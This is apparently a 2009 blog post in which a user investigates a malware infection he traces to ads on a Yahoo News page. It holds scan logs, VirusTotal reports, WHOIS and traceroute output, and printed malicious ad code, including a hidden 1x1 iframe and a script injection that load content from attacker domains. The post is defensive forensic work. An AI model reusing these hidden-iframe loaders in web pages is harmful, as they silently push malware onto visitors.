Donner's Daily Dose of Drama

Another virus infection, courtesy of Yahoo News

Major web sites like Yahoo.com and Boston.com are infecting thousands, if not hundred thousands of computers with trojans, back doors, and other viruses, through some of their ad service providers. When will the people in charge of these web sites wake up and start screening the ads that they are serving?

 

For the 2nd time in less than a week, I just spent 8 hours cleaning up my PC after a virus infection and doing some forensic analysis about where it came from. What I found gave me a bad headache.

Last night, in between compiling and testing, I read an article on Yahoo News about Obama’s science advisor and his strategies for fighting climate change. I am not giving you a link here.  Then my virus scanner popped up an alert:

avira1

The file was gone, but it was too late by then, the infection had already happened. CPU load was increasing, so I pulled the network cable and I fired up the Sysinternals Process Explorer to see what was going on. I saw a number of randomly named DLLs loaded from the /Windows/System32 folder. Deleting the files did not help, because new ones were created immedately, and revoking all permissions from the running threads did not help, either. I could not get rid of these rogue processes, and I had no idea what they were doing. So I turned off the power, booted Knoppicillin, and let Kaspersky, Avira, and BitDefender do a full scan over night. The results were meager, and I will share them here:

//
//Kaspersky Antivirus Scanner scan report
//
[09/04/09 09:31:39 I] Kaspersky Anti-Virus On-Demand Scanner for Linux. Version 5.7.20/RELEASE build #29, compiled Jul 25 2008, 13:21:47
[09/04/09 09:31:39 I] Copyright (C) Kaspersky Lab, 1997-2007.
[09/04/09 09:31:54 I] There are 1830965 records loaded, the latest update 09-04-2009, using standard bases set
[09/04/09 09:31:54 I] The scan path: /media/sdc1
[09/04/09 12:49:14 I] Scan summary: Files=171233 Folders=16955 Archives=5034 Packed=2063 Infected=0 Warnings=0 Suspicios=0 Cured=0 CureFailed=0 Corrupted=6 Protected=0 Error=0 ScanTime=03:17:18 ScanSpeed=5715.743 Kb/s

 //
// BitDefender Antivirus Scanner scan report
//
// Time: Thu Apr  9 06:41:08 2009
// Command line: --conf-file=/etc/BitDefender-scanner/bdscan.conf --archive-level=10 --log=/var/log/knoppicillin/20090409-0539-sdc1-BitDefender-scan.log.tmp --action=ignore /media/sdc1
// Core: AVCORE v1.0 (build 2337) (i386) (Oct 24 2006 15:58:21)
// Engines: scan: 17, unpack: 6, archive: 42, mail: 6
// Total signatures: 2845749
//

/media/sdc1/Quarant/bibepuru.dll infected: Gen:Trojan.Heur.Vundo.600CF3E3E3
/media/sdc1/Quarant/likarale.dll infected: Gen:Trojan.Heur.Vundo.600CF3E3E3
/media/sdc1/WINDOWS/SoftwareDistribution/Download/cb49fce0491f1a97e70eafea0ce76daa/BIT4E2.tmp=>dw20.msp bad crc
/media/sdc1/WINDOWS/system32/dudirake.dll infected: Gen:Trojan.Heur.Vundo.402CD3C3C3
/media/sdc1/WINDOWS/system32/hafomano.dll infected: Gen:Trojan.Heur.Vundo.402CD3C3C3
/media/sdc1/WINDOWS/system32/yuvuyezo.dll infected: Gen:Trojan.Heur.Vundo.402CD3C3C3
Results:
Folders           :16956
Files             :486181
Packed            :20266
Archives          :3014
Infected files    :5
Suspect files     :0
Warnings          :0
Identified viruses:2
I/O errors        :1
Files/second      :47
Scan time         :02:50:07

//
// Avira Antivir Scanner scan report
//

AntiVir / Linux Version 2.1.12-150
Copyright (c) 2008 by Avira GmbH.
All rights reserved.

Report erstellt am 09.04.2009 05:39:01

Kommandozeile: --alltypes -s -nolnk -ra -rs -r1 --alert-urls=yes --archive-max-recursion=50 --scan-mode=all -z --scan-in-mbox --heur-macro --heur-level=2 --exclude=/media/sdc1/INFECTED --moveto=/media/sdc1/INFECTED -rf/var/log/knoppicillin/20090409-0539-sdc1-Avira-AntiVir-scan.log /media/sdc1
VDF-Version: 7.1.3.34 erzeugt 08 Apr 2009

ALERT: [APPL/PsExec.F] /media/sdc1/Program Files/Sysinternals Suite/psexec.exe <<< Enthält Erkennungsmuster der Anwendung APPL/PsExec.F
ALERT-URL: http://www.avira.com/de/threats?q=APPL%2FPsExec%2EF
 Die Datei wurde verschoben.

--------- Suchergebnisse ---------
         Verzeichnisse:    16955
     Gescannte Dateien:   458771
                Alarme:        1
            Verdächtig:        0
             Repariert:        0
              Gelöscht:        0
             Umbenannt:        0
            Verschoben:        1
             Warnungen:        6
        Benötigte Zeit: 01:01:42
----------------------------------

(I apologize for the character encoding issues)
Only BitDefender found something (it found my copies of the DLLs, and the ones that were active). Avira did not like one of the Sysinternals programs. None of them found this file, also in the System32 folder: kerisudu, without extension.

Then I booted into the Recovery Console, ran FixMBR, just in case, and booted Windows XP again. The virus was active immediately, and I saw these randomly named DLLs appear in the System32 folder again. So I booted the Recovery Console once again and took the time to find and delete all suspicious files in several system folders. Then I rebooted and logged on with the administrator account, and the machine was clean. I then cleaned up the references to the deleted files in the registry, and started to look at the Temporary Internet Files folder, because I wanted to know if the virus had really come from an ad on the Yahoo page.

I was able to confirm that. I had not browsed any other page at the time in question, and the evidence was all still there. These are the files that were loaded and cached from this page, all with a timestamp of 11:06pm (the files that I identified as related to the infestation are in red):

C:\Documents and Settings\xxxx\Cookies
2009-04-08  23:06   1,869 xxxx@ad.yieldmanager[2].txt
2009-04-08  23:06     735 xxxx@zedo[1].txt
C:\Documents and Settings\xxxx\Local Settings\Temp
2009-04-08  23:06  70,656 e.exe   <== was downloaded as load[1].php
C:\Documents and Se...orary Internet Files\Content.IE5\5WY9B1QX
2009-04-08  23:06  24,890 5847529b094c7d6f84d648845da5cd92[1].swf
2009-04-08  23:06  13,407 capt.cefd91163.us_obama_science__dcsa102[1].jpg
2009-04-08  23:06   1,991 imp[3]
2009-04-08  23:06 141,994 sci_obama_science_adviser[1].htm
2009-04-08  23:06   1,177 template[2].txt
2009-04-08  23:06      82 tracksubprop[2].php
2009-04-08  23:06   3,046 videolthumb.01228.....31ae5b09c8c74fc4967[1].jpg
2009-04-08  23:06   1,170 vwaoiweuq[1].htm
C:\Documents and Se...orary Internet Files\Content.IE5\6Y1Z2NJI
2009-04-08  23:06   2,999 200x-1209600,http___d.yimg.com_a_p_umed.....jpg
2009-04-08  23:06   2,587 2ff49963a02da22da0071a9f8251b567[1].jpg
2009-04-08  23:06   4,396 64[1].pdf
2009-04-08  23:06   1,295 a[4].htm
2009-04-08  23:06     128 cached[3]
2009-04-08  23:06   2,810 fo[1].js
2009-04-08  23:06   1,177 template[2].txt
2009-04-08  23:06   3,562 _;ord=1239246364807648[1].htm
C:\Documents and Se...orary Internet Files\Content.IE5\GEAPH0QL
2009-04-08  23:06     407 753[1].htm
2009-04-08  23:06     922 imp[4]
2009-04-08  23:06  25,575 storycontextuals.....sc_sci_obama_science_adviser[1]
2009-04-08  23:06   3,228 videolthumb.000cf.....b16cbaa246499be677d6ad[1].jpg
2009-04-08  23:06   2,418 videolthumb.2eccd.....4989a11fddb0e8a6a6a3[1].jpg
2009-04-08  23:06     240 votaoiat[1].htm
C:\Documents and Se...orary Internet Files\Content.IE5\KCMJ55Y1
2009-04-08  23:06  36,115 300x250_leaves[1].swf
2009-04-08  23:06   1,301 a[1].htm
2009-04-08  23:06       0 CAROEMRF.HTM   <== was this emptied by the virus?
2009-04-08  23:06   1,640 fm[1].js
2009-04-08  23:06  70,656 load[1].php
2009-04-08  23:06   2,074 videolthumb.08248.....dac7fc0f2dd61[1].jpg
C:\WINDOWS\SoftwareDistribution\DataStore      <== I deleted this folder
2009-04-08  23:06  92,282,880 DataStore.edb    <== as a precaution
C:\WINDOWS\SoftwareDistribution\DataStore\Logs
2009-04-08  23:06    8,192 edb.chk
2009-04-08  23:06  131,072 edb.log

The exact sequence of events here is a bit difficult to determine, because there are numerous ad sites involved, Javascript, Flash, and PDF. I suspect that one of the ad links on the site loaded the file 64[1].pdf, but I don’t know which one. This file is infected and appears to exploit a script security hole in Acrobat (I may need to update my version of the viewer). Virustotal.com already knew this file (i.e. someone else had already submitted it for scanning) and reported the following:

File badfdp.pdf received on 04.08.2009 16:14:31 (CET)
Current status: finished
Result: 4/40 (10.00%)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.04.08 Virus.VBS.Obfuscated!IK
AhnLab-V3 5.0.0.2 2009.04.08
AntiVir 7.9.0.138 2009.04.08
Antiy-AVL 2.0.3.1 2009.04.08
Authentium 5.1.2.4 2009.04.08
Avast 4.8.1335.0 2009.04.08
AVG 8.5.0.285 2009.04.08
BitDefender 7.2 2009.04.08
CAT-QuickHeal 10.00 2009.04.08
ClamAV 0.94.1 2009.04.08
Comodo 1105 2009.04.08
DrWeb 4.44.0.09170 2009.04.08
eSafe 7.0.17.0 2009.04.07
eTrust-Vet 31.6.6444 2009.04.08
F-Prot 4.4.4.56 2009.04.08
F-Secure 8.0.14470.0 2009.04.08
Fortinet 3.117.0.0 2009.04.08
GData 19 2009.04.08
Ikarus T3.1.1.49.0 2009.04.08 Virus.VBS.Obfuscated
K7AntiVirus 7.10.695 2009.04.07
Kaspersky 7.0.0.125 2009.04.08
McAfee 5577 2009.04.07
McAfee+Artemis 5577 2009.04.07
McAfee-GW-Edition 6.7.6 2009.04.08
Microsoft 1.4502 2009.04.08
NOD32 3994 2009.04.07
Norman 6.00.06 2009.04.08
nProtect 2009.1.8.0 2009.04.08
Panda 10.0.0.14 2009.04.08
PCTools 4.4.2.0 2009.04.08
Prevx1 V2 2009.04.08
Rising 21.24.22.00 2009.04.08
Sophos 4.40.0 2009.04.08 Troj/PDFJs-B
Sunbelt 3.2.1858.2 2009.04.08
Symantec 1.4.4.12 2009.04.08 Bloodhound.Exploit.196
TheHacker 6.3.4.0.303 2009.04.08
TrendMicro 8.700.0.1004 2009.04.08
VBA32 3.12.10.2 2009.04.08
ViRobot 2009.4.7.1684 2009.04.08
VirusBuster 4.6.5.0 2009.04.08
Additional information
File size: 4396 bytes
MD5…: 11089aa5c5d837a305a57ff3d111ec84
SHA1..: 3ef0aef6cb137e8099d0ebf8818880f21ad9b6f4
SHA256: c20ecc01201a43ed12484a8b115669719647f3bad077a0550fdbe35966c7a4a6
SHA512: bca11e0cad744a833adebaea8fdcf697dbe3e6ef78c2a486d1b026c22f8e28dc
cba1b9adb7289c416a82b4273b76bdaae163f4b8f908bde1bb4ab7aedd447345
ssdeep: 96:eg59rMORfqarvyGbdH6t4ylCTCRa36NG9ChL1cKOUNrcGvhLMiKX5:e+9rMOl
qarvVbdH6xAQcEL/K
PEiD..: –
TrID..: File type identification
file seems to be plain text/ASCII (0.0%)
PEInfo: –
RDS…: NSRL Reference Data Set

I also found an obfuscated snippet of Javascript that, possible originating from the PDF/loaded by the PDF, that likely loaded the virus itself:

<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY leftmargin=0 topmargin=0 rightmargin=0
   bottommargin=0 marginheight=0 marginwidth=0>
<a href="http://www.qzatawzawzwa.com/uyrtwqq/">
   <IMG src="banner2.gif" width="302" height="252" border="0"></a>
<iframe src="http://zeoztz.info/kt/in.php" width="1" height="1" FRAMEBORDER="0" SCROLLING="no"></iframe>
</BODY>
</HTML>

VirusTotal did not like this:

File vwaoiweuq_1_.htm received on 04.09.2009 20:28:30 (CET)
Current status: finished
Result: 3/40 (7.50%)
 
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.04.09
AhnLab-V3 5.0.0.2 2009.04.09
AntiVir 7.9.0.138 2009.04.09
Antiy-AVL 2.0.3.1 2009.04.09
Authentium 5.1.2.4 2009.04.08
Avast 4.8.1335.0 2009.04.09
AVG 8.5.0.285 2009.04.09
BitDefender 7.2 2009.04.09
CAT-QuickHeal 10.00 2009.04.09
ClamAV 0.94.1 2009.04.09
Comodo 1107 2009.04.09
DrWeb 4.44.0.09170 2009.04.09
eSafe 7.0.17.0 2009.04.07
eTrust-Vet 31.6.6447 2009.04.09
F-Prot 4.4.4.56 2009.04.08
F-Secure 8.0.14470.0 2009.04.09
Fortinet 3.117.0.0 2009.04.09
GData 19 2009.04.09
Ikarus T3.1.1.49.0 2009.04.09
K7AntiVirus 7.10.698 2009.04.09
Kaspersky 7.0.0.125 2009.04.09
McAfee 5579 2009.04.09
McAfee+Artemis 5579 2009.04.09
McAfee-GW-Edition 6.7.6 2009.04.09 HTML.Suspicious.gen (suspicious)
Microsoft 1.4502 2009.04.09
NOD32 3997 2009.04.09
Norman 6.00.06 2009.04.09 HTML/Crypted.G
nProtect 2009.1.8.0 2009.04.09
Panda 10.0.0.14 2009.04.09
PCTools 4.4.2.0 2009.04.08
Prevx1 V2 2009.04.09
Rising 21.24.32.00 2009.04.09
Sophos 4.40.0 2009.04.09 Mal/Iframe-F
Sunbelt 3.2.1858.2 2009.04.09
Symantec 1.4.4.12 2009.04.09
TheHacker 6.3.4.0.305 2009.04.09
TrendMicro 8.700.0.1004 2009.04.09
VBA32 3.12.10.2 2009.04.09
ViRobot 2009.4.7.1686 2009.04.09
VirusBuster 4.6.5.0 2009.04.09
Additional information
File size: 1170 bytes
MD5…: 03dcde3463498da2a8d3beae5e737999
SHA1..: 9260dbd463ecd201329e9a924636b3e7769e9e98
SHA256: 215a6b1a714b7d1ece282eef58b99a85dea1c8dba2baa6218dc8d50b7abb15da
SHA512: 5954386f33c10131b5570cd6ac3508959c084027904673dd74f58fe35dc5a6af
df5cd1f4075123a4a4da05819ec4ab77523985503f7be2ab81b8511c637ec529
ssdeep: 24:IQy0dIlG8D+vskm5KnDRD7kOlmAuD6r0VVa:IQyaOG8D+vskm5KnlkbA1ga
PEiD..: –
TrID..: File type identification
Unknown!
PEInfo: –
RDS…: NSRL Reference Data Set

The anchor link target (qzatawzawzwa.com) is a bogus domain, the IFrame domain (zeoztz.info) is interesting (do not attempt to load the URL). Now it was time to run some WHOIS searches:

Domain ID:D28236326-LRMS
Domain Name:ZEOZTZ.INFO
Created On:07-Apr-2009 04:04:09 UTC
Last Updated On:07-Apr-2009 04:08:06 UTC
Expiration Date:07-Apr-2010 04:04:09 UTC
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
Registrant ID:GODA-062088235
Registrant Name:Registration Private
Registrant Organization:Domains by Proxy, Inc.
Registrant Street1:DomainsByProxy.com
Registrant Street2:15111 N. Hayden Rd., Ste 160, PMB 353
Registrant Street3:
Registrant City:Scottsdale
Registrant State/Province:Arizona
Registrant Postal Code:85260
Registrant Country:US
Registrant Phone:+1.4806242599
Registrant Phone Ext.:
Registrant FAX:+1.4806242598
Registrant FAX Ext.:
Registrant Email:ZEOZTZ.INFO@domainsbyproxy.com
[...]
Name Server:NS1.MYDYNDNS.ORG
Name Server:NS3.MYDYNDNS.ORG
Name Server:NS2.MYDYNDNS.ORG
Name Server:NS4.MYDYNDNS.ORG

This domain was registered anonymously with Godaddy just one day before I got infected (4/7)! We can probably assume that the perpetrators are in the US, or else they would have used a foreign registrar. And they are using a dynamic DNS service. Where is this domain hosted?

C:\>tracert ZEOZTZ.INFO
Tracing route to ZEOZTZ.INFO [66.135.37.21]
over a maximum of 30 hops:
 1   1 ms xxxx
 2   5 ms xxxx
 3   4 ms G11-0-0-1734.LCR-07.BSTNMA.verizon-gni.net [130.81.60.60]
 4   4 ms so-0-3-0-0.BB-RTR1.BOS.verizon-gni.net [130.81.29.252]
 5  15 ms so-9-1-0-0.BB-RTR1.NY325.verizon-gni.net [130.81.19.70]
 6  13 ms 0.so-4-3-0.XL3.NYC4.ALTER.NET [152.63.10.25]
 7  14 ms 0.ge-6-1-0.BR3.NYC4.ALTER.NET [152.63.3.166]
 8  15 ms xe-10-2-0.edge2.NewYork2.level3.net [4.68.110.233]
 9  14 ms vlan51.ebr1.NewYork2.Level3.net [4.69.138.222]
10  22 ms ae-3-3.ebr2.Washington1.Level3.net [4.69.132.89]
11  42 ms ae-82-82.csw3.Washington1.Level3.net [4.69.134.154]
12  39 ms ae-81-81.ebr1.Washington1.Level3.net [4.69.134.137]
13  39 ms ae-2.ebr3.Atlanta2.Level3.net [4.69.132.85]
14  73 ms ae-7.ebr3.Dallas1.Level3.net [4.69.134.21]
15  61 ms ae-63-63.csw1.Dallas1.Level3.net [4.69.136.154]
16 176 ms ae-13-69.car3.Dallas1.Level3.net [4.68.19.5]
17  58 ms PEER-1-NETW.car3.Dallas1.Level3.net [4.71.120.10]
18  66 ms 10ge-ten1-3.sat-8500v-cor-2.peer1.net [216.187.124.178]
19 208 ms 216.187.124.110
20  86 ms server1.advert-base.net [66.135.37.21]
Trace complete.

This IP address is hosted with Serverbeach in San Antonio, TX:

OrgName: ServerBeach
OrgID: SERVER-17
Address: 8500 Vicar Drive 8500, Suite 500
City: San Antonio
StateProv: TX
PostalCode: 78218
Country: US
NetRange: 66.135.32.0 - 66.135.63.255
CIDR: 66.135.32.0/19
NetName: SERVER-ALLOC-1
NetHandle: NET-66-135-32-0-1
Parent: NET-66-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.SERVERBEACH.COM
NameServer: NS2.SERVERBEACH.COM
Comment:
RegDate: 2003-05-19
Updated: 2007-05-08
OrgAbuseHandle: SNAE-ARIN
OrgAbuseName: Serverbeach Network AUP Enforcement
OrgAbusePhone: +1-604-484-2588
OrgAbuseEmail: abuse@serverb.....com
OrgTechHandle: ZZ4092-ARIN
OrgTechName: ipadmin
OrgTechPhone: +1-210-225-4725
OrgTechEmail: ipadmin@serverb.....com
# ARIN WHOIS database, last updated 2009-04-08 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

This is a shared hosting server that likely was compromised and hijacked, using one of the known PHP security exploits. This lead ends here, and if I feel better again tomorrow, maybe I will write them an email. Eitherway, this server probably hosts the malware. I did not verify that, since I don’t have a sandbox environment to try it out. But my investigation was far from done.

The binary was downloaded and ended up in the cache as load[1].php. This file was somehow copied into the Local Settings/Temp folder as e.exe, and was executed from there. Believe it or not, this file has version information: BDA Monitor Application, Version 5, 6, 1215, 0, Internal name emmon.exe, Company eMPIA Technology, Inc. Of course I sent this to VirusTotal, which reported the following:

File load_1_.php received on 04.09.2009 20:02:54 (CET)
Current status: finished
Result: 9/40 (22.50%)
 
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.04.09 Trojan-Downloader.Win32.BHO!IK
AhnLab-V3 5.0.0.2 2009.04.09
AntiVir 7.9.0.138 2009.04.09
Antiy-AVL 2.0.3.1 2009.04.09
Authentium 5.1.2.4 2009.04.08
Avast 4.8.1335.0 2009.04.09
AVG 8.5.0.285 2009.04.09
BitDefender 7.2 2009.04.09
CAT-QuickHeal 10.00 2009.04.09 (Suspicious) – DNAScan
ClamAV 0.94.1 2009.04.09
Comodo 1107 2009.04.09
DrWeb 4.44.0.09170 2009.04.09
eSafe 7.0.17.0 2009.04.07 Suspicious File
eTrust-Vet 31.6.6447 2009.04.09
F-Prot 4.4.4.56 2009.04.08
F-Secure 8.0.14470.0 2009.04.09
Fortinet 3.117.0.0 2009.04.09
GData 19 2009.04.09
Ikarus T3.1.1.49.0 2009.04.09 Trojan-Downloader.Win32.BHO
K7AntiVirus 7.10.698 2009.04.09
Kaspersky 7.0.0.125 2009.04.09
McAfee 5579 2009.04.09
McAfee+Artemis 5578 2009.04.08
McAfee-GW-Edition 6.7.6 2009.04.09
Microsoft 1.4502 2009.04.09 Trojan:Win32/Vundo.gen!AK
NOD32 3997 2009.04.09
Norman 6.00.06 2009.04.09
nProtect 2009.1.8.0 2009.04.09
Panda 10.0.0.14 2009.04.09
PCTools 4.4.2.0 2009.04.08
Prevx1 V2 2009.04.09 High Risk Fraudulent Security Program
Rising 21.24.32.00 2009.04.09
Sophos 4.40.0 2009.04.09 Troj/Virtum-Gen
Sunbelt 3.2.1858.2 2009.04.09 Virtumonde
Symantec 1.4.4.12 2009.04.09
TheHacker 6.3.4.0.305 2009.04.09
TrendMicro 8.700.0.1004 2009.04.09
VBA32 3.12.10.2 2009.04.09
ViRobot 2009.4.7.1686 2009.04.09
VirusBuster 4.6.5.0 2009.04.09 Trojan.Vundo.Gen!Pac.37
Additional information
File size: 70656 bytes
MD5…: 2a0ca54511de7d1a4e7248c4ffe4e3a2
SHA1..: 3d13c0dfc9a7e5b622e3d531d62dcc7c328aabe6
SHA256: c2ecee1bd9a846303a330a16ac05aa3c2ea8a87e1e940456ae1524e03f0e8c16
SHA512: 1c695276695b437b926f8ad471137ac125ed521a15efb3ccbce61311a4457d6d
56b313a4d9707ad27773bae3cf888be68265c972733b448586639a37d747428d
ssdeep: 1536:1w0GHEhRZm2uhT/erL3WDRE7pkbCcG+IbDsxu9:mo7pKCf3WDRUSbURbDQQ
PEiD..: –
TrID..: File type identification
Win32 Dynamic Link Library (generic) (55.5%)
Clipper DOS Executable (14.7%)
Generic Win/DOS Executable (14.6%)
DOS Executable Generic (14.6%)
VXD Driver (0.2%)
PEInfo: PE Structure information( base data )
entrypointaddress.: 0x12f0
timedatestamp…..: 0x47f283f8 (Tue Apr 01 18:50:32 2008)
machinetype…….: 0x14c (I386)( 6 sections )
name viradd virsiz rawdsiz ntrpy md5
.text 0x1000 0x6b18 0x6c00 7.81 07460923f2de1430104dbc7acd13997b
.data 0x8000 0x2695 0x2800 7.74 cbec888a96ffceeaea3b8624b30fc961
BSS 0xb000 0x644 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e
.rdata 0xc000 0x66af 0x6800 7.98 93ad60f547b9fcf7c9374614ad9a69cd
.rsrc 0x13000 0x978 0xa00 3.01 4c6e38897b5bd7631b61432747f3aef2
.reloc 0x14000 0x9dbe 0xa00 7.85 4d80d92f4dd7ccc825be5e9dae7f3d68( 2 imports )
> kernel32.dll: BeginUpdateResourceA, CloseHandle, CreateFileA, DeleteFileA, FindClose, FindFirstFileA, GetEnvironmentStringsW, GetLastError, GetVersion, GlobalFree, HeapAlloc, HeapCreate, HeapDestroy, HeapReAlloc, IsBadReadPtr, IsBadWritePtr, MultiByteToWideChar, ResetEvent, RtlUnwind, SetFilePointer, Sleep
> user32.dll: AdjustWindowRectEx, EnableWindow, GetClassInfoExA, GetDC, GetKeyState, GetMenuItemCount, GetMessageA, GetMessageTime, GrayStringA, InvalidateRgn, PeekMessageA, RemovePropA, SetCapture, SetMenuItemBitmaps, TranslateMessage( 0 exports )
RDS…: NSRL Reference Data Set

This is when I started to feel a bit sicklish. Once again, my virus scanners were totally in the dark about this threat. Avira, Kaspersky, and BitDefender did not find anything wrong with this file. Ikarus performed far better and recognized all three threats.

The following domain was referenced from one of the other Javascript snippets:

Domain ID:D28236327-LRMS
Domain Name:YWEQZA.INFO
Created On:07-Apr-2009 04:04:09 UTC
Last Updated On:07-Apr-2009 04:06:31 UTC
Expiration Date:07-Apr-2010 04:04:09 UTC
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
Registrant ID:GODA-062088234
Registrant Name:Registration Private
Registrant Organization:Domains by Proxy, Inc.
Registrant Street1:DomainsByProxy.com
Registrant Street2:15111 N. Hayden Rd., Ste 160, PMB 353
Registrant Street3:
Registrant City:Scottsdale
Registrant State/Province:Arizona
Registrant Postal Code:85260
Registrant Country:US
Registrant Phone:+1.4806242599
Registrant Phone Ext.:
Registrant FAX:+1.4806242598
Registrant FAX Ext.:
Registrant Email:YWEQZA.INFO@domainsbyproxy.com
[...]
Name Server:NS1.MYDYNDNS.ORG
Name Server:NS3.MYDYNDNS.ORG
Name Server:NS2.MYDYNDNS.ORG
Name Server:NS4.MYDYNDNS.ORG

And then, there was this bit of Javascript:

//  Copyright (c) 2000-2009 ZEDO Inc. All Rights Reserved.
var zzD=window.document;
if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}
if(zzuid=='unknown')zzuid='y3j7BwoBACgAAC4LKCUAAACG';
var zzhasAd;
var zzpixie = new Image();
var zzStr = "s=0;u=y3j7BwoBACgAAC4LKCUAAACG;z=" + Math.random();
var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
else{var zzIdxTrd = zzTrd;}
if (typeof zzIdxNw == 'undefined' || zzIdxNw.length == 0) { var zzIdxNw = ''; }
else { zzIdxNw = ';sn=' + zzIdxNw + ';';}
if (typeof zzIdxCh == 'undefined' || zzIdxCh.length == 0) { var zzIdxCh = ''; }
else { zzIdxCh = 'sc=' + zzIdxCh + ';';}
if (typeof zzIdxPub == 'undefined' || zzIdxPub.length == 0) { var zzIdxPub = ''; }
else { zzIdxPub = 'ss=' + zzIdxPub + ';';}
if (typeof zzIdxPos == 'undefined' || zzIdxPos.length == 0) { var zzIdxPos =''; }
else { zzIdxPos = 'si=' + zzIdxPos + ';';}
if (typeof zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
/*
*/
document.write('<script language="javascript"
src="http://www.ads-solution.net/aclk/ads/b95fe080/id=140/"><\/script>');
document.write('<noscript><a href="http://www.ads-solution.net/aclk/ads/b95fe080/140/clk/" target="_blank">');
document.write('<img src="http://www.ads-solution.net/aclk/ads/b95fe080/140/dp/" width=300 height=250 border=0></a></noscript>');

The domain that is referenced at the end, ads-solution.net, is suspicious, because it is also new and does not seem to belong to a legitimate business. I cannot say what these links return – I did not want to try it a 2nd time. Maybe this was where it all started.

ads-solution.net
Registrant:
Domains by Proxy, Inc.
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States
Registered through: GoDaddy.com, Inc.
Domain Name: ADS-SOLUTION.NET
Created on: 06-Apr-09
Expires on: 06-Apr-10
Last Updated on: 06-Apr-09
Domain servers in listed order:
DNS1.NETTICA.COM
DNS2.NETTICA.COM
DNS3.NETTICA.COM
DNS4.NETTICA.COM
DNS5.NETTICA.COM

Nettica appears to be a hosting provider, and since they use the official DNS servers for the ads-solution domain, the owner must be known to Nettica. One would think:

AboutUs: NETTICA.COM
Registrant:
Graham, Alan
Nettica Corporation
3130 Sugarloaf Parkway Ste 1100-150
Lawrenceville, GA 30045
US
Domain Name: NETTICA.COM
Administrative Contact, Technical Contact:
Graham, Alan support@nettica.com
Nettica Corporation
3130 Sugarloaf Parkway Ste 1100-150
Lawrenceville, GA 30045 US
678-344-8702 fax: 678-344-5021
Record expires on 17-May-2013.
Record created on 17-May-2003.
Database last updated on 9-Apr-2009 15:15:37 EDT.
Domain servers in listed order:
DNS1.NETTICA.COM 64.94.136.11
DNS2.NETTICA.COM 64.237.45.34
DNS3.NETTICA.COM 64.94.136.13
DNS4.NETTICA.COM 69.41.170.223
DNS5.NETTICA.COM 212.100.247.15
Registry Status: clientTransferProhibited

Shall we assume that Alan has something to do with this mess? Most certainly not. Nettica is just providing DNS service for the ads-solution.net domain.1

As you can see, I uncovered a lot, but did not get quite to the bottom of this attack. The servers are still up, and who knows how many hundreds or thousands of people got infected. And who knows what this virus actually does … the thicket of online advertising is almost unpenetrable, and analyzing all the links and references from this one page on Yahoo would a lot longer than the one day I was willing to spare. What is really sickening about this, though, is that you are no longer safe on sites like Yahoo.com, even if you have a virus scanner, up-to-date software, and do everything you think is necessary to stay free of viruses, trojans, and root kits.

There is a lot more work to do, but I need to move on. Feel free to contact me if you know something that should be added.

1 It is now midnight and it appears that that Nettica has removed the DNS record for ads-solution.net. The site is no longer reachable by the domain name.

Exit mobile version